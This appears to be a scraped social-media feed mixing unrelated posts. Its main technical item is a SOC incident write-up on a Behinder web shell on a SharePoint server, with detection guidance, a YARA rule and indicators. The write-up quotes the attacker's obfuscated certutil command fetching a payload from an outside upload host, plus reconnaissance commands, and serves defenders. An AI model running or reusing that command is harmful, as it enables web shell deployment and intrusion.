DRM and big tech's war on ownership has led me to make my own media libraries, and you should too.
DRM and big techx27;s war on ownership has led me to make my own media libraries, and you should too.#Streaming #DataHoarding
The Digital Packrat Manifesto
DRM and big tech's war on ownership has led me to make my own media libraries, and you should too.Janus Rose (404 Media)
The SOC files: Chasing the web shell
Web shells have evolved far beyond their original purpose of basic remote command execution, and many now function more like lightweight exploitation frameworks. These tools often include features such as in-memory module execution and encrypted command-and-control (C2) communication, giving attackers flexibility while minimizing their footprint.
This article walks through a SOC investigation where efficient surface-level analysis led to the identification of a web shell associated with a well-known toolset commonly associated with Chinese-speaking threat actors. Despite being a much-discussed tool, it is still used by the attackers for post-exploitation activities, thanks to its modular design and adaptability. We’ll break down the investigative process, detail how the analysts uncovered the web shell family, and highlight practical detection strategies to help defenders identify similar threats.
Onset
It’s early Monday morning, almost 4am UTC time, and the apparent nighttime calm inside the SOC is abruptly interrupted by an alert from our SIEM. It indicates that Kaspersky Endpoint Security’s heuristic engine has detected a web shell (HEUR:Backdoor.MSIL.WebShell.gen
) on the SharePoint server of a government infrastructure in Southeast Asia, a warning that no SOC analyst would want to ignore.
C:\Windows\System32\inetsrv\w3wp.exe -ap "SharePoint" [...]
└── "cmd.exe" /c cd /d "[REDACTED]"&,;;;,@cer^t^u^t^il -u""""r""""l""""c""""a""""c""""h""""e"""" -split -f hxxps://bashupload[.]com/[REDACTED]/404.aspx 404.aspx
└── C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\[REDACTED]\[REDACTED]\App_Web_404.aspx.[REDACTED].[REDACTED].dll
The night shift team springs into action, knowing that the web shell could be the beginning of much worse activity, and that every second counts. Initial analysis of the telemetry suggests that the attackers exploited the affected web server, either by taking advantage of another web shell or a command injection vulnerability.
From the listing above, where the process tree that triggered the first detection is reported, it is possible to observe an attempt to deploy a web shell disguised as a 404 page. The certutil utility was used to download the ASPX payload, which was hosted by abusing Bashupload. This web service, which is used to upload files from the command line and allows one-time downloads of samples, is no stranger to being abused as an ingress tool transfer technique.
As is common practice, the command has been slightly obfuscated by using escape characters (such as ^ and “) to break up the keywords “certutil” and “urlcache” in order to bypass basic detection rules based on simple pattern matching.
As part of our MDR service, we are required to operate within pre-established boundaries that are tailored to the customer’s business continuity needs and risk tolerance. In this case, the customer retains ownership of decisions regarding sensitive assets, including the isolation of compromised hosts, so we can’t instantly block the attack and must continue to observe and perform a preliminary threat analysis.
A manual reconnaissance and discovery activity by an operator starts appearing, and despite the tension, an occasional typo (“localgorup”) manages to draw a smile:
whoami
net user
query user
net localgorup administrators
net localgroup administrators
whoami /all
"cmd.exe" /c cd /d "[REDACTED]"&,;;;,@cer^t^u^t^il[...]
Aftermath
To gain system privileges, the threat actors used several variants of the well-known Potato tools, either as memory-only modules or as standalone executables:
Paths:
C:\ProgramData\DRM\god.exe
C:\Users\Default\Videos\god.exe
MD5: 0xEF153E1E216C80BE3FDD520DD92526F4
Description: GodPotato
Process: C:\Windows\System32\inetsrv\w3wp.exe
MD5 (memory region): 0xB8A468615E0B0072D2F32E44A7C9A62F
Description: BadPotato
Original filename: BadPotato.dll
MD5 (memory region): 0xB5755BE4AAD8D8FE1BD0E6AC5728067B
Description: SweetPotato
Original filename: SweetPotato.dll
To bring standalone binaries into the environment, the attackers again used the Bashupload free web service, which we saw in the initial web shell alert. Of all the tools, the GodPotato standalone binary ultimately succeeded in gaining system privileges.
With elevated access, the attackers moved on to domain trust enumeration, mapping relationships between domains and identifying potential targets for lateral movement. But let’s get back to the main question: What kind of web shell are we dealing with here?
Identifying the threat
Unfortunately, we were unable to retrieve the web shell sample used during the initial access phase. However, starting with the privilege escalation phase, several .NET modules began to appear in the memory of the IIS worker process (
w3wp.exe), ranging from popular tools like Potato to other lesser known ones. One set of libraries in particular caught our attention, so we decided to investigate further by performing a manual inspection.
Fortunately, the libraries were not obfuscated and lent themselves to quick static analysis:
Example of a library detected in IIS process memory (0x0B593115C273A90886864AF7D4973EED)
In the image above, if you look at the orange method names in the Assembly Explorer on the left, you can observe some peculiarities that can be used to identify similar samples. Although many of the methods names are very generic, there is one that is quite unique,
EnjsonAndCrypt. A quick Google search of this name yields no results, which means it may be sample-specific.
The
getExtraData method is also interesting: although it has a non-specific name, there is a sequence of bytes [126, 126, 126, 126, 126, 126] that is used to parse key:value pairs whose value is base64 encoded:
The “extraData” structure example
Threat actors need to use the same byte sequence if they want to maintain backward compatibility across different implant versions, but since it is also very generic, we should combine both indicators, the getExtraData name and this byte array, to define a sufficiently precise detection condition that can be used in conjunction with EnjsonAndCrypt to create a detection rule.
Uncovering modules and variants
By feeding our newly created YARA rule to a multi-AV platform such as VirusTotal, we can identify additional samples that differ from those observed in the targeted infrastructure. It is worth noting that some of these have a poor detection rate:
Poorly detected BasicInfo.dll (32865229279DE31D08166F7F24226843) sample
Below are the most common names of libraries that match the rule:
BShell.dll
BasicInfo.dll
Cmd.dll
Database.dll
Echo.dll
Eval.dll
FileOperation.dll
Hs.dll
LoadNativeLibrary.dll
Loader.dll
Plugin.dll
PortMap.dll
RealCMD.dll
RemoteSocksProxy.dll
ReversePortMap.dll
SocksProxy.dll
Transfer.dll
Utils.dll
Module filenames
Those familiar with the toolkit used may have already identified it by looking at these filenames, but if not, it is also possible to infer the relationship by simply pivoting to the samples available on VT:
Sample FC793D722738C7FCDFE8DED66C96495B relations on VT
Behinder, also known as Rebeyond, Ice Scorpion, 冰蝎 (Bīng xiē), is known as a cross-platform web shell designed to be compatible with most popular web servers running PHP, Java or ASP.NET as in our investigation. Although the web shell sample itself is very lightweight and somewhat basic, the tool includes a powerful GUI for operators with numerous capabilities including loading additional modules and giving them full control over compromised environments.
Its built-in AES-encrypted communication allows threat actors to maintain stealthy control over a compromised web server, often bypassing traditional network detection mechanisms, and its modular, flexible nature allows malicious actors to use it as a base for customization even though it is only available as a pre-built tool on GitHub. Moreover, the presence of several step-by-step Chinese language tutorials on CSDN (Chinese Software Developer Network) makes it widely accessible to opportunistic bad actors.
The bigger picture
Taking a step back, the relationship between the memory artifacts observed on the customer’s server during the post-exploitation phase and the web shell source code becomes evident. The web shell is not just a foothold, it’s a fully functional backdoor that facilitates encrypted communication with the operators’ infrastructure, allowing them to call built-in or custom-loaded libraries, deploy additional tools, conduct reconnaissance and exfiltrate data while remaining hidden:
ASPX web shell side by side with .NET payload
Although the Behinder web shell has been widely discussed in the past, especially the PHP and JSP variants, it is still a current and evolving cyberweapon. Even if attackers make mistakes or act carelessly by reusing the same encryption keys or exhibiting the same patterns, we can’t afford to let our guard down. In the incident described in this article, if we had not taken the time to dig deeper into the artifacts observed in memory, we likely would have missed the toolkit altogether.
Threats evolve quickly, and signature-based malware detection only catches what we already know. Underestimating the potential of memory-based payloads can lead to a false sense of security. Teams may assume that if they haven’t detected any suspicious files, they are safe, when in fact threats may be actively operating in memory.
For SOC teams, continuous learning, proactive threat hunting, and refining detection techniques are essential to staying ahead of adversaries.
Happy hunting and see you on the next mission!
YARA rule
rule dotnetFrozenPayload
{
strings:
$CorDllMain_mscoree_dll = {00 5F 43 6F 72 44 6C 6C 4D 61 69 6E 00 6D 73 63 6F 72 65 65 2E 64 6C 6C 00}
$EnjsonAndCrypt = {00 45 6E 6A 73 6F 6E 41 6E 64 43 72 79 70 74 00}
$getExtraData = {00 67 65 74 45 78 74 72 61 44 61 74 61 00}
$extraDataMagicArray = {00 7E 7E 7E 7E 7E 7E 00} //0x00, byte[] {126, ...,}, 0x00
condition:
uint16(0) == 0x5A4D and
filesize < 400000 and
$CorDllMain_mscoree_dll and
(
$EnjsonAndCrypt or
(
$getExtraData and $extraDataMagicArray
)
)
}
Indicators of compromise
Payloads
EF153E1E216C80BE3FDD520DD92526F4 god.exe
B8A468615E0B0072D2F32E44A7C9A62F BadPotato.dll
B5755BE4AAD8D8FE1BD0E6AC5728067B SweetPotato.dll
578A303D8A858C3265DE429DB9F17695 BasicInfo.dll
EA19D6845B6FC02566468FF5F838BFF1 FileOperation.dll
CD56A5A7835B71DF463EC416259E6F8F Cmd.dll
5EA7F17E75D43474B9DFCD067FF85216 Echo.dll
File paths
C:\ProgramData\DRM\
C:\Users\Default\Videos\
A Different Take on the River Table Does it in Bronze
River tables are something we’ve heard decried as a passé, but we’re still seeing some interesting variations on the technique. Take this example done with bronze instead of epoxy.
Starting with two beautiful slabs of walnut, [Burls Art] decided that instead of cutting them up to make guitars he would turn his attention to a river table to keep them more intact. Given the price of copper and difficulty in casting it, he decided to trim the live edges to make a more narrow “river” to work with for the project.
Since molten copper is quite toasty and wood likes to catch on fire, he wisely did a rough finish of the table before making silicone plugs of the voids instead of pouring metal directly. The silicone plugs were then used to make sand casting molds, and a series of casting trials moving from copper to bronze finally yielded usable pieces for the table. In case that all seems too simple, there were then several days of milling and sanding to get the bronze and walnut level and smooth with each other. The amount of attention to detail and plain old elbow grease in this project is impressive.
We’ve seen some other interesting mix-ups of the live edge and epoxy formula like a seascape night light or this river table with embedded neon. And if you’re looking to get into casting, why not start small in the microwave?
youtube.com/embed/slu4A4L0bqo?…
Cheap Fiber Optic Wand Toy Becomes Tiny Weird Display
If you’ve ever seen those cheap LED fiber optic wands at the dollar store, you’ve probably just thought of them as a simple novelty. However, as [Ancient] shows us, you can turn them into a surprisingly nifty little display if you’re so inclined.
The build starts by removing the fiber optic bundle from the wand. One end is left as a round bundle. At the other end, the strands are then fed into plastic frames to separate them out individually. After plenty of tedious sorting, the fibers are glued in place in a larger rectangular 3D-printed frame, which holds the fibers in place over a matrix of LEDs. The individual LEDs of the matrix light individual fibers, which carry the light to the round end of the bundle. The result is a tiny little round display driven by a much larger one at the other end.
[Ancient] had hoped to use the set up for a volumetric display build, but found it too fragile to be fit for purpose. Still, it’s interesting to look at nonetheless, and a good demonstration of how fiber optics work in practice. As this display shows, you can have two glass fibers carrying completely different wavelengths of light right next to each other without issue.
We’ve featured some other great fiber optic hacks over the years, like this guide on making your own fiber couplings. Video after the break.
youtube.com/embed/zz59e1wWyVc?…
[Thanks to Zane and Darryl and Ash for the tip! This one was all over the tipsline!]
Different Than reshared this.
Low-Resolution Fluid Simulation On An ESP32
Fluid simulations are a key tool in fields from aerospace to motorsports and even civil engineering. They can be three-dimensional and complicated and often run on supercomputer clusters bigger than your house. However, you can also do simple two-dimensional fluid simulations on very simple hardware, as [mircemk] demonstrates.
This build is almost like a simple toy that displays particles rolling around and tumbling as you turn it one way or the other. Behind the scenes, an ESP32 is running the show, simulating a group of particles responding to gravity in a fluid-like manner. The microcontroller is hooked up with an 3-axis gyroscope and accelerometer, which it uses to track motion and influence the motion of the particles in turn. The results of the simple fluid simulation are displayed on a screen made up of a 16 x 16 matrix of WS2812B addressable RGB LEDs, which add enough color to make the build suitably mesmerizing.
There’s something compelling about turning the display and watching the particles tumble and flow, particularly when they’re all set to different colors. [mircemk] also gave the build the ability to operate in several different modes, running “sand,” “liquid” and “gas” simulations and with dynamic coloring to boot.
We’ve seen some great videos from [mircemk] before, too, like this sensitive metal detector rig.
youtube.com/embed/AwRup7wAijU?…
Tech in Plain Sight: Shopping Cart Locks
The original locking wheel.
Shopping carts are surprisingly expensive. Prices range up to about $300 for a cart, which may seem like a lot, but they have to be pretty rugged and are made to work for decades. Plastic carts are cheaper, but not by much.
And carts have a way of vanishing. We’ve seen estimates that cart theft costs hundreds of millions of dollars worldwide annually. To stem the tide, stores sometimes pay a reward to people to round up carts off the street and return them to the store — it’s cheaper than buying a new one. That led [Elmer Isaacks] to patent a solution to this problem in 1968.
The [Isaacks] system used lots of magnets. A cart leaving the store had a brake that would be armed by running over a magnet. Customers were expected to follow a path surrounded by magnets to prevent the brake from engaging. If you left the track, a rod passing through the wheel locked it.
A third magnet would disarm the brake when you entered the store again. This is clever, but it has several problems. First, you have to insert magnets all over the place. Second, if someone knows how the system works, a simple magnet will hold the brake off no matter what.The original modern-style court from a 1946 paten
There are some low-tech ways to stop theft, too. For example, if the store has barriers too narrow for the carts to pass, customers can’t leave the store. That’s not very nice if you are trying to get a week’s worth of stuff to your car. You sometimes see poles on carts rising taller than the door, to prevent the cart from leaving the building, which, of course, has the same problem.
Some stores, particularly Aldi, require a small deposit to get a cart. You get the deposit back when you return the cart. This not only discourages theft but also cuts down on having to hire kids to round up carts in the parking lot. The problem is that the deposit is usually a low-denomination coin, so if you really want to steal a $200 shopping cart, losing a quarter is probably not much of a deterrent.
Higher Tech
Building on the [Isaacks] solution, more modern systems use a perimeter fence — usually a wire, but sometimes magnets — that causes the brake to engage if you roll the cart over it.
This drives the cost up and is expensive to install. Worse, if you only have one wheel lock, a smart customer could lift that wheel off the ground and bypass the virtual fence. That means you probably want two locking wheels, although that still doesn’t preclude a strong thief or two thieves from carrying the cart over the line. You can see a breakdown of what’s happening in the Science Channel video below.
youtube.com/embed/PWZOeM5jdjg?…
Smart cart locks can also help solve “pushout,” an industry term for people filling a cart and walking out without paying. A properly equipped cart can determine if it exits the store without going through a checkout line. This is probably error-prone and not foolproof, but it might stop many pushouts.
youtube.com/embed/e7KzPQrzY-c?…
Where’s the Hack?
Many common carts use 7.8 kHz signals on the sensing wire. Since that’s within the range of audio, you can actually hack them pretty easily.
A DEFCON presentation shows how you can use your phone to lock and unlock shopping carts. Not that we suggest you do that. As [Joseph Gabay] notes: “I never really wanted a shopping cart, but…I have the knowledge that if I wanted a shopping cart, I could have one.” His video below shows many of the internal details of some of the common shopping cart systems.
youtube.com/embed/fBICDODmCPI?…
Who Knew?
You’d think a shopping cart was about the simplest thing you’d deal with all day. But, like many things these days, it conceals some very high-tech electronics. And it seems like there should be some better options. Locking wheels might be fine when you have someone actually stealing, but if you ever have a cart lock up while you are moving quickly, it isn’t pleasant.
If you become super interested in shopping carts, the National Museum of American History has a section of shopping carts. Why not? People get obsessed with strange things. If the modern system seems familiar, maybe you are thinking of invisible doggie fences. If you want to hack a cart, you probably want to buy your own to start with.
Featured image: “Large Capacity Shopping Cart” from the National Museum of American History collection.
Ministero dell'Istruzione
📣 Dal 12 al 14 marzo 2025 si svolgerà l’ottava edizione di Didacta Italia a Firenze, presso la Fortezza da Basso! Il #MIM sarà presente all’importante appuntamento dedicato alla formazione e all’innovazione scolastica con oltre 130 eventi, organizzat…Telegram
Ieri il Ministro Giuseppe Valditara si è recato nelle Marche per una visita istituzionale in alcune scuole del territorio e per incontrare studenti, docenti e amministratori locali.
Qui tutti i dettagli ➡️ mim.gov.
Ministero dell'Istruzione
Ieri il Ministro Giuseppe Valditara si è recato nelle Marche per una visita istituzionale in alcune scuole del territorio e per incontrare studenti, docenti e amministratori locali. Qui tutti i dettagli ➡️ https://www.mim.gov.Telegram
Welcome to the bi-weekly tech-focused update on everything that is happening on Bluesky and the wider ATmosphere. The theme continues to be: “can ATProto scale down“? Next week will be focused again on Bluesky and it’s surrounding ecosystem of media apps. The News Constellation is a project that recently released that provides a database of […]
6 momenti notevoli del disastroso incontro fra Zelensky e Trump
Il presidente statunitense ha trattato con grande sufficienza quello ucraino, accusandolo di voler rischiare una Terza guerra mondiale, tra le altre coseIl Post
reshared this
Il 28 febbraio 2017 ci lasciava Leone di Lernia.
Ricordo quella mattina di ottobre del 1998 a Milano, all'altezza di viale Bligny, quando io e il Pierre fermi al semaforo, veniamo avvicinati da un'auto con sopra Leone e due giovani ragazze. Guarda il nostro cabriolet bianco, con la capote aperta, si alza in piedi e dice:"Permettete che ci piscio dentro?"
Magari un'altra volta.
"Trenta chili" Leone di Lernia e il Complesso l'Universo (1968)
(Stuart Kauffman "Reinventare il sacro" Codice Edizioni)
Qui sulla Terra, una buona metà di noi crede in un Dio creatore. Qualche altro miliardo crede in un Dio abramitico soprannaturale, e alcuni altri negli antichi dei indù. Tradizioni di saggezza, come il buddismo, sono spesso senza Dio. Circa un miliardo di persone è laico, ma privo di spiritualità e semplice consumatore materialista in una società laica. Se c'è qualcosa a cui noi laici teniamo è l'umanesimo. Ma l'umanesimo, in un'accezione ristretta, è troppo esile per nutrirci come agenti umani nel vasto universo che in parte co-creiamo. Abbiamo bisogno, credo, di un dominio per la nostra vita, ampio come la realtà. Se la metà di noi crede in un Dio soprannaturale, la scienza non confuterà quella fede. Abbiamo bisogno di un luogo per la nostra spiritualità, e un Dio creatore è uno di quei luoghi. Siamo noi, sostengo, ad aver inventato Dio, il più potente dei nostri simboli. E' una nostra scelta la saggezza con cui usare il nostro simbolo per orientare la nostra vita e la nostra civiltà. Credo che possiamo reinventare il sacro. Possiamo inventare un'etica globale in uno spazio condiviso, uno spazio sicuro per noi tutti, dove Dio va inteso come creatività naturale nell'universo.
questa cosa non ha alcun senso...
considerando che il costo di una polizza si bassa sulla statistica di quanto costa un evento per l'assicurato e quale sia la probabilità che un evento generico si realizzi, in uno specifico arco di tempo.
ora sappiamo che l'incidenza di questo tipo di eventi, diventato "frequente" negli ultimi anni, e pure destinato a salire nell'arco dei prossimi anni, facciamo qualche calcolo
opzione 1) un'assicurazione che mettiamo debba "contabilizzare il rischio" di dover rimborsare il 25% degli assicurati entro i prossimi 2-3 anni, dovrò far pagare un premio che è l'ammontare dei danni programmati per i prossimi anni + un guadagno. e in questo caso il costo dell'assicurazione sarà molto salato per le imprese. alcune potrebbero dover chiudere per l'impossibilità di pagare. quale azienda può assumersi il rischio statistico di perdere l'intera struttura ogni 2-3 anni?
opzione 2) il rischio è così elevato che nessuna assicurazione accetterà di stipulare polizze del genere, perché anti-economiche. perché eventi di questo genere sono diventati la norma e non più l'eccezione.
per capire il problema basti pensare al fatto che sono già sparite le polizze di protezione cristalli sulle auto, a causo della maggior incidenza statistica di questo genere di danno.
opzione 3) magari per legge le aziende assicurative saranno costrette a offrire le polizze a prezzi fattibili, e in questo caso alla prima calamità assisteremo al fallimento dell'assicurazione e quindi a nessun pagamento...
il fatto che secondo l'ottica di qualcuno le assicurazioni sono ladre ed hanno tanti soldi, non significa che offrire una garanzia del genere sia comunque fattibile, di fronte al futuro che ci attende poi. e neppure pare che il mondo voglia davvero preoccuparsi dei cambiamenti climatici... ditelo a cina, brasile, india, usa e urss....
a chiunque scaricherai la patata bollente alla fine, non sarà in grado di pagare. che sia l'azienda, un'assicurazione, o lo stato. e detti questi 3 non mi viene in mente nessun altro che possa pagare.
Polizze catastrofali, decreto attuativo in GU sul filo di lana: scadenza il 31 marzo
Polizze catastrofali, è stato pubblicato in Gazzetta Ufficiale del 27 febbraio il decreto attuativo. Confermata la scadenza del 31 marzo 2025 per le imprese. Assicurazioni già in essere da adeguareAnna Maria D'Andrea (Informazione Fiscale)
Da Londra a Bruxelles, la settimana della verità per la difesa europea
@Notizie dall'Italia e dal mondo
Occhi puntati su Londra questa domenica per il vertice sulla Difesa europea indetto dal primo ministro britannico, Keir Starmer, al rientro dal suo incontro con Donald Trump alla Casa Bianca. Invitati a partecipare non solo istituzioni e Paesi membri dell’Ue, ma anche Norvegia, Turchia e vertici
Notizie dall'Italia e dal mondo reshared this.
PEDOPORNOGRAFIA ONLINE. LA COOPERAZIONE INTERNAZIONALE FUNZIONA, MA INDAGINI DIFFICILI PER UTILIZZO DELLA INTELLIGENZA ARTIFICIALE
Mentre la Polizia Postale e delle comunicazioni italiana dà notizia di una vasta operazione nazionale (denominata Hello) contro la pedopornografia on line (commissariatodips.it/notizie/a…), Europol fornisce la comunicazione di una vasta attività internazionale, denominata Cumberland.
Sono 25 gli arresti in 19 paesi (l'Italia non è compresa) per sfruttamento sessuale infantile, in una operazione coordinata da Europol ed iniziata dalle forze dell'ordine danesi. Nel corso dell'azione, sinora, sono stati 273 i sospetti identificati, 33 le perquisizioni svolte e 173 dispositivi elettronici sequestrati.
Il principale sospetto - un cittadino danese arrestato a novembre 2024 - gestiva una piattaforma online per distribuire materiale generato da AI.
Gli utenti potevano accedere al contenuto dopo aver effettuato un pagamento simbolico per ottenere una password.
La crescente facilità di creazione di immagini AI ha complicato l'identificazione di vittime e colpevoli, rendendo difficile per le autorità identificare se ci siano vittime reali coinvolte. Infatti le immagini generate da AI possono sembrare autentiche, rendendo difficile distinguere tra contenuti reali e artificiali. Inoltre la crescente facilità di creazione di tali immagini consente anche a individui con scarse competenze tecniche di produrle. Infine la mancanza di legislazione nazionale specifica rende complicata l'indagine e l'identificazione delle vittime.
Europol lancerà quindi una campagna per prevenire futuri crimini legati all'uso illegale dell'AI: la campagna mira a raggiungere i potenziali acquirenti di contenuti illegali attraverso messaggi online e altre strategie, come visite dirette e lettere di avviso.
L'obiettivo è educare e dissuadere i criminali, oltre a fornire supporto a chi cerca aiuto.
#operazioneHello #operationCumberland #pedopornografia #cooperazioneinternazionaledipolizia #Europol #poliziapostaleedellecomunicazioni
Attualità, Geopolitica e Satira reshared this.
GRECIA: sciopero generale e manifestazioni oceaniche contro il governo
@Notizie dall'Italia e dal mondo
Enormi manifestazioni in Grecia nel giorno dello sciopero generale proclamato contro il governo, accusato di aver insabbiato le indagini contro i responsabili del disastro ferroviario di Tempes
L'articolo GRECIA: sciopero generale e manifestazioni oceaniche contro
Notizie dall'Italia e dal mondo reshared this.
Quale futuro per la Us Navy. Le sfide tra cantieristica e Cina nell’era Trump
@Notizie dall'Italia e dal mondo
Durante l’audizione di conferma davanti alla Commissione per i servizi armati del Senato Usa, John Phelan, indicato da Donald Trump come prossimo segretario alla Marina (SecNav), ha esposto quelle che saranno le sue priorità come nuovo capo della US Navy e del Corpo dei Marine. Ridurre i
Notizie dall'Italia e dal mondo reshared this.
UE e India pongono le basi per un accordo di libero scambio entro l’anno
L'articolo proviene da #Euractiv Italia ed è stato ricondiviso sulla comunità Lemmy @Intelligenza Artificiale
Di fronte alla guerra commerciale innescata dagli Stati Uniti e alla sfida posta dal rallentamento dell’economia cinese e della conseguente sovra produzione,
Intelligenza Artificiale reshared this.
Ddl Spazio, Pandolfo (Pd): “Nessuna crociata anti-Musk e Starlink. Ma non possiamo affidarci a un monopolista”
@Politica interna, europea e internazionale
Nessun inciucio tra Partito Democratico e Fratelli d’Italia e nessuna crociata contro Elon Musk né tantomeno pregiudizi verso il servizio Starlink di SpaceX ma solo un’attenzione alla salvaguardia della sicurezza nazionale e della capacità
Politica interna, europea e internazionale reshared this.
I femminismi di fronte alla cultura woke
@Politica interna, europea e internazionale
8 marzo 2025, dalle ore 10:00 alle ore 18:00 presso l’Aula Malagodi della Fondazione Luigi Einaudi Introduce Lucetta Scaraffia Contro la strumentalizzazione del diritto, di Silvia Niccolai Maternità fra parto, aborto e gravidanza per altri, di Adriana Cavarero Le difficili alleanze tra i femminismi contemporanei, di Olivia
Politica interna, europea e internazionale reshared this.
Intervista Katana Koala Kiwi
#PostRock
#Shoegaze
#Emo
#PostPunk
#MusicaIndipendente
#NuovaMusica
#BandTriestina
#IntervistaMusicale
#EPDebutto
#PerFarmiCoraggioMiSonoButtatoDalPianoTerra
#SoundFresh
#CulturaMusicale
#PowerTrio iyezine.com/intervista-katana-…
Intervista Katana Koala Kiwi
Intervista Katana Koala Kiwi - Katana Koala Kiwi: scopri il loro EP di debutto "Per farmi coraggio mi sono buttato dal piano terra", una fusione di suoni freschi e dirompenti! - Katana Koala KiwiMassimo Argo (In Your Eyes ezine)
Misc Cyborg reshared this.
Swedbank rifiuta la trasparenza nel calcolo automatico degli interessi La banca svedese Swedbank sostiene falsamente che la logica alla base del calcolo automatico dei tassi di interesse è un "segreto commerciale" mickey27 February 2025
HP Compaq 8200 Elite - i5-2500, 4GB RAM ⚠️DA RIPARARE⚠️ - Questo è un post automatico da FediMercatino.it
Prezzo: 0 $
Regalo computer HP Compaq 8200 Elite Convertible Minitower.
Il PC ha qualche problema, si avvia regolarmente ma ho riscontrato i seguenti problemi:
- La ventola dell'alimentatore è rumorosa
- Alcuni slot della RAM a volte danno errore
Caratteristiche
- Modello: HP Compaq 8200 Elite Convertible Minitower
- CPU: Intel Core i5-2500 @ 3,30 GHz
- RAM: 4 GB DDR4
- Hard disk: NON PRESENTE
- Porte frontali: 4 x USB 2.0, 1 x cuffie, 1 x microfono
- Porte posteriori: 6 x USB 2.0, 2 x Display Port, 1 x VGA, 2 x PS/2 (mouse/tastiera), 1 x seriale RS-232, 1 x Ethernet RJ45
- Scheda video integrata Intel HD Graphics 2000
Il computer viene regalato, sono disposto anche a spedirlo, con spedizioni a carico dell'acquirente. Possibile ritiro a mano in zona Bergamo.
Price: 0 $ :: Questo è un articolo disponibile su FediMercatino.it
Si prega di rispondere con un messaggio diretto/privato al promotore dell'annuncio.
like this
reshared this
Trump aumenta la pressione su Teheran. L’Iran prova a resistere
@Notizie dall'Italia e dal mondo
Sanzioni commerciali, dazi e tagli già applicati contro Teheran da anni non sono riusciti a spingere la Repubblica Islamica a rivedere la propria strategia politica e militare
L'articolo Trump aumenta la pressione su Teheran. L’Iran prova a resistere proviene da Pagine Esteri.
Notizie dall'Italia e dal mondo reshared this.
Missili ipersonici per l’esercito Usa. Quando arriveranno
@Notizie dall'Italia e dal mondo
Dopo un lungo ritardo dovuto alle difficoltà nei test, l’Esercito degli Stati Uniti prevede di fornire un sistema d’arma ipersonico a lungo raggio alla prima unità entro la fine dell’anno fiscale 2025, secondo quanto dichiarato a Defense News da funzionario del Pentagono. Una data che, comunque, rimane ben lontana dall’obiettivo
Notizie dall'Italia e dal mondo reshared this.
A Kursk tornano le truppe nordcoreane. Mosca si gioca il tutto per tutto
@Notizie dall'Italia e dal mondo
Nonostante (e forse a maggior ragione) le manovre diplomatiche in corso tra Stati Uniti e Russia, Mosca non accenna a ridurre la pressione sul fronte ucraino, gettando altri soldati nordcoreani nella mischia. Secondo l’Intelligence sudcoreana, Pyongyang avrebbe inviato altre unità, almeno un migliaio,
Notizie dall'Italia e dal mondo reshared this.
Stampante Canon Pixma TS9150 printer - Questo è un post automatico da FediMercatino.it
Prezzo: 150 €
I am selling a Canon Pixma TS9150 series (specs), used three times in total. Available for shipment anywhere in the EEA, in person delivery in Western Liguria and South Piedmont, Italy, and Côte d’Azur in France. Negotiable price.
Price: 150€ – This item is available on FediMercatino.it
Please reply with a direct/private message to the account that posted this, or to @Tommi 🤯.
Vendo una Canon Pixma TS9150 series (specs), usata in totale tre volte. Disponibile per spedizione ovunque nell’EEA, oppure consegna di persona nella Liguria di ponente e sud Piemonte, in Italia, e Costa Azzurra in Francia. Prezzo trattabile.
Prezzo: 150€ – Questo è un articolo disponibile su FediMercatino.it
Si prega di rispondere con un messaggio diretto/privato al promotore dell’annuncio, o a @Tommi 🤯.
reshared this
Oggi, 28 febbraio, nel 2013, papa Benedetto XVI rinunciò al "ministero petrino"
Le "dimissioni" di Papa Ratzinger annunciate l'11 febbraio 2013 da Benedetto XVI, furono effettive a partire dal 28 febbraio
TechGuy reshared this.
Notizie
RIFLESSIONI SULL’EUROPA, USA E CONFLITTO ISRAELO-PALESTINESE.
Mappa geografica dell’Europa Riguardo le ultime vicende accadute in questi giorni in Europa e altre parti del mondo, urge una breve riflessione ma è una riflessione nuda e cruda. 1) Il fatto …Vincenzo Tartaglia Blog
18thousand children killed by izrahell
She is the 18000th victim. (But we all know that by saying 18 thousand we are underestimating the real number of Palestinian children killed by israel).
Poliversity - Università ricerca e giornalismo reshared this.
Il Molise non esiste.
@Privacy Pride
Il post completo di Christian Bernieri è sul suo blog: garantepiracy.it/blog/il-molis…
Fuori dal mondo Il Molise esiste, eccome se esiste, ma forse pensa di essere in un universo parallelo dove, a discapito dei Molisani, non si applica il GDPR. Si può vivere senza GDPR? Tecnicamente si, si sopravvive, ma con molte complicazioni. Se mi capitasse di…
Privacy Pride reshared this.
Metafore belliche
massimogiuliani.it/blog/tag/me…
Stampante Canon Pixma TS9150 printer - Questo è un post automatico da FediMercatino.it
Prezzo: 150 €
I am selling a Canon Pixma TS9150 series (specs), used three times in total. Available for shipment anywhere in the EEA, in person delivery in Western Liguria and South Piedmont, Italy, and Côte d’Azur in France. Negotiable price.
Price: 150€ – This item is available on FediMercatino.it
Please reply with a direct/private message to the account that posted this, or to @Tommi 🤯.
Vendo una Canon Pixma TS9150 series (specs), usata in totale tre volte. Disponibile per spedizione ovunque nell’EEA, oppure consegna di persona nella Liguria di ponente e sud Piemonte, in Italia, e Costa Azzurra in Francia. Prezzo trattabile.
Prezzo: 150€ – Questo è un articolo disponibile su FediMercatino.it
Si prega di rispondere con un messaggio diretto/privato al promotore dell’annuncio, o a @Tommi 🤯.
reshared this
Il grande bluff delle terre rare dell’Ucraina: l’accordo di Trump con Zelensky si fonda su un equivoco
Il presidente americano vuole mettere le mani sui minerali di Kiev. C'è solo un problema: non è detto che l'Ucraina disponga davvero delle risorse che cercaGianluca Brambilla (Open)
Francesco
in reply to Il Fedimercatino / Flohmarkt /Flohra • • •Il Fedimercatino / Flohmarkt /Flohra likes this.
Il Mercatino del Fediverso 💵♻️ reshared this.
Il Fedimercatino / Flohmarkt /Flohra
in reply to Francesco • •@Francesco devi inviare un messaggio privato al nick che vedi a questa pagina: fedimercatino.it/~andreabusi/f…
ossia
@ andreabusi@fedimercatino.it
Il Mercatino del Fediverso 💵♻️ reshared this.